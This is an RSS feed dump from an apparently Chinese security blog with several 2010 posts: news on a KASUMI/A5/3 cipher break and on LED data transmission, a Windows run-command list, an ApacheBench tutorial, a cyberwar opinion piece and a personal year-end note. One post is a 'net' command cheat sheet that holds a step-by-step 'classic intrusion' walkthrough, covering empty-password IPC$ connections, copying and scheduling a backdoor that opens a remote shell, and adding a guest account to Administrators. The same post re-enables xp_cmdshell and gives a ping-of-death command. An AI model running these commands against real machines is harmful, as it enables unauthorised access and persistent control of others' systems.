http://www.xxsec.com/index.php zh-cn http://www.xxsec.com/read.php?453 ebola <> Mon, 18 Jan 2010 01:46:18 +0000 http://www.xxsec.com/read.php?453
更令人感到害怕的是手机运营商的态度，当28岁的德国电脑工程师Karsten Nohl宣布破解了64位GSM加密系统之后，他们只是承认了这套系统在安全方面存在的问题，却迟迟不肯出台新的加密算法。

现在，连更高级别的手机通讯加密机制--KASUMI系统--这个采用128位A5/3加密算法的系统也已经被人们成功破解，这套系统正被目前新兴的3G网络所使用。相比去年破解64位的A5/1加密系统时采用Nvidia GPU集群花费了数月时间破解出2TB密码本的工作，这次破解行动则使用了更为复杂的算法（related-key sandwich attack）来破解128位加密系统，而且破解的过程只花了2个小时，关于这次破解的更详细描述可以点击这个链接查看。

这次破解是由以色列Weizmann科学学院（ Weizmann Institute of Science ）数学系以及计算机科学系的教职员工完成的。参与这次破解的有 Orr Dunkelman, Nathan Keller和Adi Shamir,其中Adi Shamir便是大名鼎鼎的RSA公钥加密算法的发明人之一。

他们所使用的破解算法采用了一种不断更换密钥的方法，“我们只需要使用4个相关联的密钥。226个数据，230比特内存，经过232次计算便可以完成破解。计算的复杂性很小，我们使用单台PC机只花了不到两个小时便模拟了整个破解过程。”

不过据Karsten Nohl教授介绍，这种破解方式从有效性上看不如之前的A5/1破解方式，由于这种破解方法必须事先编好数百万条内容已知的明文，然后再把这些明文一一放到运营商的无线网络中进行传输，之后截获这些信息并对运营商的加密方式进行破解，因此虽然破解计算本身速度很快，但传送明文并搜集截获的信息所花费的时间却需要很长。

目前运营商所使用的KASUMI(A5/3)加密算法是在MISTY算法的基础上改进而来。MISTY算法是由三菱的工程师开发出来的，原始的MISTY算法保密性更强，但所需完成的计算任务则比KASUMI算法更为繁重。

尽管GSM运营商应该考虑尽快更换老旧的A5/1算法，升级为更高级的KASUMI系统，但据Nohl表示，这次的研究结果表明，“即使是更高级的KASUMI系统同样也存在可被轻易破解的问题，希望运营商们在升级GSM加密系统时能好好考虑一下这个问题。”

不过，目前大多数运营商连何时将GSM加密系统升级到KASUMI都心里没底，更不要说如何快速响应这次的研究结果了。GSM网络真是漏洞重重，奉劝各位还是不要在手机上讲太多话，以免不幸被跨省追捕。
]]> http://www.xxsec.com/read.php?452 ebola <> Mon, 18 Jan 2010 01:41:25 +0000 http://www.xxsec.com/read.php?452 德国西门子公司15日发表公报说,该公司和海因里希·赫茨研究所的科学家通过特殊方式使发光二极管(LED)高频闪烁,附近的光电探测器将接收到这种光信号转换为电脉冲,其信息传输速度达到每秒500兆。

此前可见光通信最高传输速度为每秒200兆,也是由西门子和海因里希·赫茨研究所共同创造的。

与无线局域网相比,可见光通信技术可利用荧光灯或发光二极管等室内照明设备发射信号。利用具备接收和送发信息功能的电脑以及移动信息终端,用户可以在室内灯光照射到的地方,下载和上传数据。这种技术安全性高,只要用窗帘遮住光线,信息就不会外泄至室外,减少了数据被窃的可能性。

------------------
今后只能半夜上网了，白天太亮，不能上网！ ]]> http://www.xxsec.com/read.php?451 ebola <> Wed, 13 Jan 2010 01:33:04 +0000 http://www.xxsec.com/read.php?451
Tags - 百度 , 黑客 , 战争 ]]> http://www.xxsec.com/read.php?448 ebola <> Tue, 12 Jan 2010 03:25:07 +0000 http://www.xxsec.com/read.php?448
Tags - 百度 , 黑 ]]> http://www.xxsec.com/read.php?449 ebola <> Mon, 11 Jan 2010 03:28:34 +0000 http://www.xxsec.com/read.php?449 sndrec32-------录音机
Nslookup-------IP地址侦测器
explorer-------打开资源管理器
logoff---------注销命令
tsshutdn-------60秒倒计时关机命令
lusrmgr.msc----本机用户和组
services.msc---本地服务设置
oobe/msoobe /a----检查XP是否激活
notepad--------打开记事本
cleanmgr-------垃圾整理
net start messenger----开始信使服务
compmgmt.msc---计算机管理
net stop messenger-----停止信使服务
conf-----------启动 netmeeting
dvdplay--------DVD播放器
charmap--------启动字符映射表
diskmgmt.msc---磁盘管理实用程序
calc-----------启动计算器
dfrg.msc-------磁盘碎片整理程序
chkdsk.exe-----Chkdsk磁盘检查
devmgmt.msc--- 设备管理器
regsvr32 /u *.dll----停止dll文件运行
drwtsn32------ 系统医生
rononce -p ----15秒关机
dxdiag---------检查DirectX信息
regedt32-------注册表编辑器
Msconfig.exe---系统配置实用程序
rsop.msc-------组策略结果集
mem.exe--------显示内存使用情况
regedit.exe----注册表
winchat--------XP自带局域网聊天
progman--------程序管理器
winmsd---------系统信息
perfmon.msc----计算机性能监测程序
winver---------检查Windows版本
sfc /scannow-----扫描错误并复原
taskmgr-----任务管理器（2000／xp／2003）
Tags - cmd , 命令 ]]> http://www.xxsec.com/read.php?444 ebola <> Sun, 10 Jan 2010 03:46:43 +0000 http://www.xxsec.com/read.php?444
ab的全称是ApacheBench，是 Apache 附带的一个小工具，专门用于 HTTP Server 的benchmark testing，可以同时模拟多个并发请求。看起来也不错，很简单，也很容易使用。
一般的使用方法：ab -c 并发数 -n 请求数 URL地址

通过下面的一个简单的例子和注释，相信大家可以更容易理解这个工具的使用。

一个简单的例子

/*在这个例子的一开始，我执行了这样一个命令 ab -n 10 -c 10 http://www.google.com/。这个命令的意思是启动 ab ，向 www.google.com 发送10个请求(-n 10) ，并每次发送10个请求(-c 10)——也就是说一次都发过去了。跟着下面的是 ab 输出的测试报告，红色部分是我添加的注释。*/

C:\Program Files\Apache Software Foundation\Apache2.2\bin>ab -n 10 -c 10 http
://www.google.com/
This is ApacheBench, Version 2.0.40-dev <$Revision: 1.146 $> apache-2.0
Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/
Copyright 1997-2005 The Apache Software Foundation, http://www.apache.org/

Benchmarking www.google.com (be patient).....done
Server Software:        GWS/2.1
Server Hostname:        www.google.com
Server Port:            80
Document Path:          /
Document Length:        230 bytes
Concurrency Level:      10
/*整个测试持续的时间*/
Time taken for tests:   3.234651 seconds
/*完成的请求数量*/
Complete requests:      10
/*失败的请求数量*/
Failed requests:        0
Write errors:           0
Non-2xx responses:      10
Keep-Alive requests:    10
/*整个场景中的网络传输量*/
Total transferred:      6020 bytes
/*整个场景中的HTML内容传输量*/
HTML transferred:       2300 bytes
/*大家最关心的指标之一，相当于 LR 中的 每秒事务数 ，后面括号中的 mean 表示这是一个平均值*/
Requests per second:    3.09 [#/sec] (mean)
/*大家最关心的指标之二，相当于 LR 中的 平均事务响应时间 ，后面括号中的 mean 表示这是一个平均值*/
Time per request:       3234.651 [ms] (mean)
/*这个还不知道是什么意思，有知道的朋友请留言，谢谢 ^_^ */
Time per request:       323.465 [ms] (mean, across all concurrent requests)
/*平均每秒网络上的流量，可以帮助排除是否存在网络流量过大导致响应时间延长的问题*/
Transfer rate:          1.55 [Kbytes/sec] received
/*网络上消耗的时间的分解，各项数据的具体算法还不是很清楚*/
Connection Times (ms)
              min  mean[+/-sd] median   max
Connect:       20  318 926.1     30    2954
Processing:    40 2160 1462.0   3034    3154
Waiting:       40 2160 1462.0   3034    3154
Total:         60 2479 1276.4   3064    3184
/*下面的内容为整个场景中所有请求的响应情况。在场景中每个请求都有一个响应时间，其中 50％ 的用户响应时间小于 3064 毫秒，60 ％ 的用户响应时间小于 3094 毫秒，最大的响应时间小于 3184 毫秒*/
Percentage of the requests served within a certain time (ms)
  50%   3064
  66%   3094
  75%   3124
  80%   3154
  90%   3184
  95%   3184
  98%   3184
  99%   3184
100%   3184 (longest request)

---------------------------
参数详解

ab is a tool for benchmarking your Apache Hypertext Transfer Protocol(HTTP) server. It is designed to give you an impression of how your current Apache installation performs. This especially shows you how many requests per second your Apache installation is capable of serving.
ab是Apache超文本传输协议(HTTP)的性能测试工具。 其设计意图是描绘当前所安装的Apache的执行性能， 主要是显示你安装的Apache每秒可以处理多少个请求。
OPTIONS
-A auth-username:password
Supply BASIC Authentication credentials to the server. The user name and password are separated by a single : and sent on the wire base64 encoded. The string is sent regardless of whether the server needs it (i.e., has sent an 401 authentication needed).
对服务器提供BASIC认证信任。 用户名和密码由一个:隔开，并以base64编码形式发送。 无论服务器是否需要(即, 是否发送了401认证需求代码)，此字符串都会被发送。
-c concurrency
Number of multiple requests to perform at a time. Default is one request at a time.
一次产生的请求个数。默认是一次一个。
-C cookie-name=value
Add a Cookie: line to the request. The argument is typically in the form of a name=value pair. This field is repeatable.
对请求附加一个Cookie:行。 其典型形式是name=value的一个参数对。 此参数可以重复。
-d Do not display the "percentage served within XX [ms] table".
(legacy support).
不显示"percentage served within XX [ms] table"的消息(为以前的版本提供支持)。
-e csv-file
Write a Comma separated value (CSV) file which contains for each percentage (from 1% to 100%) the time (in milliseconds) it took to serve that percentage of the requests. This is usually more useful than the 'gnuplot' file; as the results are already 'binned'.
产生一个以逗号分隔的(CSV)文件， 其中包含了处理每个相应百分比的请求所需要(从1%到100%)的相应百分比的(以毫秒为单位)时间。 由于这种格式已经“二进制化”，所以比'gnuplot'格式更有用。
-g gnuplot-file
Write all measured values out as a 'gnuplot' or TSV (Tab separate values) file. This file can easily be imported into packages like Gnuplot, IDL, Mathematica, Igor or even Excel. The labels are on the first line of the file.
把所有测试结果写入一个'gnuplot'或者TSV (以Tab分隔的)文件。 此文件可以方便地导入到Gnuplot, IDL, Mathematica, Igor甚至Excel中。 其中的第一行为标题。
-h Display usage information.
显示使用方法。
-H custom-header
Append extra headers to the request. The argument is typically in the form of a valid header line, containing a colon-separated field-value pair (i.e., "Accept-Encoding: zip/zop;8bit").
对请求附加额外的头信息。 此参数的典型形式是一个有效的头信息行，其中包含了以冒号分隔的字段和值的对 (如, "Accept-Encoding: zip/zop;8bit").
-i Do HEAD requests instead of GET.
执行HEAD请求，而不是GET。
-k Enable the HTTP KeepAlive feature, i.e., perform multiple
requests within one HTTP session. Default is no KeepAlive.
启用HTTP KeepAlive功能，即, 在一个HTTP会话中执行多个请求。 默认是不启用KeepAlive功能.
-n requests
Number of requests to perform for the benchmarking session. The default is to just perform a single request which usually leads to non-representative enchmarking results.
在测试会话中所执行的请求个数。 默认时，仅执行一个请求，但通常其结果不具有代表意义。
-p POST-file
File containing data to POST.
包含了需要POST的数据的文件.
-P proxy-auth-username:password
Supply BASIC Authentication credentials to a proxy en-route. The username and password are separated by a single : and sent on the wire base64 encoded. The string is sent regardless of whether the proxy needs it (i.e., has sent an 407 proxy authentication needed).
对一个中转代理提供BASIC认证信任。 用户名和密码由一个:隔开，并以base64编码形式发送。 无论服务器是否需要(即, 是否发送了401认证需求代码)，此字符串都会被发送。
-q When processing more than 150 requests, ab outputs a progress count on stderr every 10% or 100 requests or so. The -q flag will suppress these messages.
如果处理的请求数大于150， ab每处理大约10%或者100个请求时，会在stderr输出一个进度计数。 此-q标记可以抑制这些信息。
-s When compiled in (ab -h will show you) use the SSL protected https rather than the http protocol. This feature is experimental and very rudimentary. You probably do not want to use it.
用于编译中(ab -h会显示相关信息)使用了SSL的受保护的https， 而不是http协议的时候。此功能是实验性的，也是很简陋的。最好不要用。
-S Do not display the median and standard deviation values, nor display the warning/error messages when the average and median are more than one or two times the standard deviation apart. And default to the min/avg/max values. (legacy support).
不显示中值和标准背离值， 而且在均值和中值为标准背离值的1到2倍时，也不显示警告或出错信息。 默认时，会显示 最小值/均值/最大值等数值。(为以前的版本提供支持).
-t timelimit
Maximum number of seconds to spend for benchmarking. This implies a -n 50000 internally. Use this to benchmark the server within a fixed total amount of time. Per default there is no timelimit.
测试所进行的最大秒数。其内部隐含值是-n 50000。 它可以使对服务器的测试限制在一个固定的总时间以内。默认时，没有时间限制。
-T content-type
Content-type header to use for POST data.
POST数据所使用的Content-type头信息。
-v verbosity
Set verbosity level - 4 and above prints information on headers, 3 and above prints response codes (404, 200, etc.), 2 and above prints warnings and info.
设置显示信息的详细程度 - 4或更大值会显示头信息， 3或更大值可以显示响应代码(404, 200等), 2或更大值可以显示警告和其他信息。
-V Display version number and exit.
显示版本号并退出。
-w Print out results in HTML tables. Default table is two columns wide, with a white background.
以HTML表的格式输出结果。默认时，它是白色背景的两列宽度的一张表。
-x -attributes
String to use as attributes for . Attributes are inserted .
设置属性的字符串。 此属性被填入.
-X proxy[:port]
Use a proxy server for the requests.
对请求使用代理服务器。
-y -attributes
String to use as attributes for .
设置属性的字符串.
-z

-attributes String to use as attributes for	. 设置	属性的字符串. BUGS There are various statically declared buffers of fixed length. Combined with the lazy parsing of the command line arguments, the response headers from the server and other external inputs, this might bite you. It does not implement HTTP/1.x fully; only accepts some 'expected' forms of responses. The rather heavy use of strstr(3) shows up top in profile, which might indicate a performance problem; i.e., you would measure the ab performance rather than the server's. 程序中有各种静态声明的固定长度的缓冲区。另外，对命令行参数、服务器的响应头和其他外部输入的解析也很简单，这可能会有不良后果。它没有完整地实现HTTP/1.x; 仅接受某些'预想'的响应格式。strstr(3)的频繁使用可能会带来性能问题，即, 你可能是在测试ab而不是服务器的性能。 Tags - 开源 , 性能 , 测试工具 , apache , bench使用说明 ]]> http://www.xxsec.com/read.php?447 ebola <> Fri, 08 Jan 2010 06:34:03 +0000 http://www.xxsec.com/read.php?447 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z：盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要*这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 -------------------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 ------------------------------------------------------- 3389 DOS开启 ------------------------------------------------------- echo [Components] > c:\sql echo TSEnable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q --------- C:\>dir c:\sysoc.inf /s 检查INF文件的位置 C:\> dir c:\sysocmgr.* /s 检查组件安装程序 ------------------------------------------------------- query user 查看正在使用的用户 logoff user 踢掉正在使用帐号的ID（这里的ID不是你的帐号） ------------------------------------------------------- 删除Radmin服务 r_server.exe /stop r_server /uninstall /silence ------------------------------------------------------- 开启cmdshell的SQL语句 EXECsp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断存储扩展是否存在 Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 恢复xp_cmdshell Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' 返回结果为1就OK 否则上传xplog7.0.dll Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll' 堵上cmdshell的SQL语句 sp_dropextendedproc "xp_cmdshell" Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' net use 命令的使用2006-07-31 07:481、建立IPC$、admin$连接：net use \\计算机名或IP\ipc$          (输入administrator与 password) 2查看连接共享：net share 3、映射共享到本地：net u** *： \\计算机或IP\共享名称  如：net u** *: \\pc1\c$ net use \\ip\ipc$ "密码"  /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名　密码　/add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名　 开启服务；(如:net start telnet， net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接的共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 edit 打开某文件 net ver 局域网内正在使用的网络连接类型和信息 net share 查看本地开启的共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C：共享 net user guest 12345 用guest用户登陆后用将密码改为12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口的网络连接情况，常用netstat -an netstat -v 查看正在进行的工作 netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） netstat -s 查看正在使用的所有协议使用情况 nbtsta* -* ** 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、 /A-A表示 删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除 当前目录下除系统文件以外的所有文件 经典入侵模式     这个入侵模式太经典了     1. C:/>net use //127.0.0.1/IPC$ "" /user:"admintitrators"       这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话， 就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名， 输入administrators，命令即可成功完成。     2. C:/>copy srv.exe //127.0.0.1/admin$       先复制srv.exe上去，在流光(下面提供下载)ools目录下就有（这里的$是指admin用户的c:/winnt/system32/，大家还可以使用c$、d$，意思 是C盘与D盘，这看你要复制到什么地方去了）。     3. C:/>net time //127.0.0.1       查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。     4. C:/>at //127.0.0.1 11:05 srv.exe       用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）       5. C:/>net time //127.0.0.1     再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。     6. C:/>telnet 127.0.0.1 99       这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口 的Shell。     虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了     7.C:/>copy ntlm.exe //127.0.0.1/admin$ s     用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。     8. C:/WINNT/system32>ntlm       输入ntlm启动（这里的C:/WINNT/system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候 ，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！       9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧, 哈哈)     为了以防万一,我们再把guest激活加到管理组       10. C:/>net user guest /active:yes       将对方的Guest用户激活     11. C:/>net user guest 1234       将Guest的密码改为1234,或者你要设定的密码     12. C:/>net localgroup administrators guest /add       将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) Tags - net , use , 命令 ]]> http://www.xxsec.com/read.php?450 ebola <> Wed, 06 Jan 2010 03:50:55 +0000 http://www.xxsec.com/read.php?450 7以上的说明显示器性能不错； 能看到6-7的说明显示器一般； 5以下的显示器比较糟糕，长期看，对眼睛有伤害。 ]]> http://www.xxsec.com/read.php?443 ebola <> Mon, 04 Jan 2010 14:44:56 +0000 http://www.xxsec.com/read.php?443 　　2050年，英中两国的一场外交争端险些升级为全面战争。然而北京并没有发射导弹或派战机摧毁英国境内目标，而是选择了一个更简单的计划击败敌人。它把灯给关了。 　　人民解放军下属一个黑客组对英国电脑系统发动攻击。几分钟后，英国的发电厂、自来水公司、空中交通管理部门、政府和财政系统全部被关闭。英国试图以核武化的三叉戟导弹还击中国，但由于计算机系统停运被迫放弃发射。 　　在英中关系改善时期，北京对英国以及英国盟友发起网络战的想法看似幻象。但上周，布朗遭遇了一个完全不同的中国，一个好像对以盟友方式行事毫无兴趣的中国。布朗和米利班德对阿克毛事件的抗议，只换回不要干涉中国内部事务的坚定告诫。中国对外部世界态度的冷酷现实一览无余。北京惟一真正优先考虑的就是照顾自身利益。 　　中国不愿意在互相关心的问题上与西方合作的原因，可以上溯到19世纪鸦片战争带来的精神创伤。当时的屈辱让中国人感到的深深愤恨延续至今。 　　为确保外国力量无法再次对中国任意摆布，北京投入巨大努力发展可以使西方军事力量毫无用武之地的技术。近年来，中国黑客对五角大楼和白宫等西方目标实施网络袭击。据报道，中国黑客每年尝试对美国政府电脑系统进行10万多次攻击。 　　现在，西方安全专家们相信，北京已经授权军方起草一份网络战争蓝图，旨在2050年前获取使西方军队火力失效的能力。五角大楼最近报告说两名颇具实力的中国黑客已经被招募，并将起草一份计划，让中国有能力以网络袭击的方式瘫痪美国整个航母战斗群。 　　该蓝图是北京在2050年前对每个主要对手实现“电子统治”计划的一部分。计划的主要目标国包括美国、英国、韩国和俄罗斯。有关部门正在全国范围内举行黑客大赛，以期招募最棒的黑客加入网络军队。一名西方安全专家说：“中国人知道，与西方打网络战的话，他们能找到更合算更高效的方法实现技术领先。” 　　英国政府现在非常关注中国网络战士，并成立了网络安全管理中心。布朗的安全顾问韦斯特勋爵说，英国将招募英国最好的黑客还击中国黑客。他去年警告说，世界大国之间未来的战争发生在互联网上的可能性更大。 Tags - 黑客牛b，关闭核导弹，攻击英国 ]]> http://www.xxsec.com/read.php?442 ebola <> Fri, 01 Jan 2010 14:41:00 +0000 http://www.xxsec.com/read.php?442 回想过去的09年，很多事情值得回忆： 工作 这算是09年的一件大事，换了工作，跳了个新行业，但还是继续做IT和安全。 离开过去漂泊、日夜颠倒、全国流窜的风险评估生活，很怀念，时常梦回云南、内蒙、贵州、湖北..... 满以为已经工作8年，不会再对工作、生活、世界观、价值观有所改变，但不得不说过去两年的工作改变了我，重塑了我。 心底里感谢曾经和现在帮助我的人们。感谢goodwell、鸭子、老刘给我机会和信任，感谢Amxku、CC、瑾申、振海和所有人，我们一起经历摸爬滚打，曾在同一战壕里战斗，事实证明你们是逆境中值得托付的伙伴。 过去的两年虽然辛苦，但是给了我不同的视角，快乐的心情，难得的机会、非凡的经历和难以复制无比宝贵的经验。 家庭 也是因为换了工作，生活重归安逸和平淡，能够每天准点上下班和稳定的生活，老婆很开心，但也因为不能伴我商务旅行有一点遗憾；孩子幼儿园了，健健康康，家人都好，开开心心是福。 学习 首先得说，有了家庭之后，自由的时间少了很多，学习的时间非常零散，效率很低。 曾经有过很理想化的学习计划，但是现在看看难以实现的居多，想学的东西太多，看的越多就越感觉自己无知。 在新的环境逐渐有了新的目标，10年要考点证书才行，毕竟今后的日子还是很艰苦的，竞争很激烈。 生活 祖国大好河山，要去的地方太多。趁着西藏还没有被开发的太太商业化，应该去一次。 离开城市和现代化的生活，背包做驴也是10年的梦，能不能实现，限制的因素太多，现在不做奢望，有机会一定争取。 09年下半年胖了20斤，10年保持体形和健康生活也要列入计划。 诺亚方舟的票我买不起，万一2012了，或许今后有人能看到此文。 Tags - 09年 , 10年 ]]>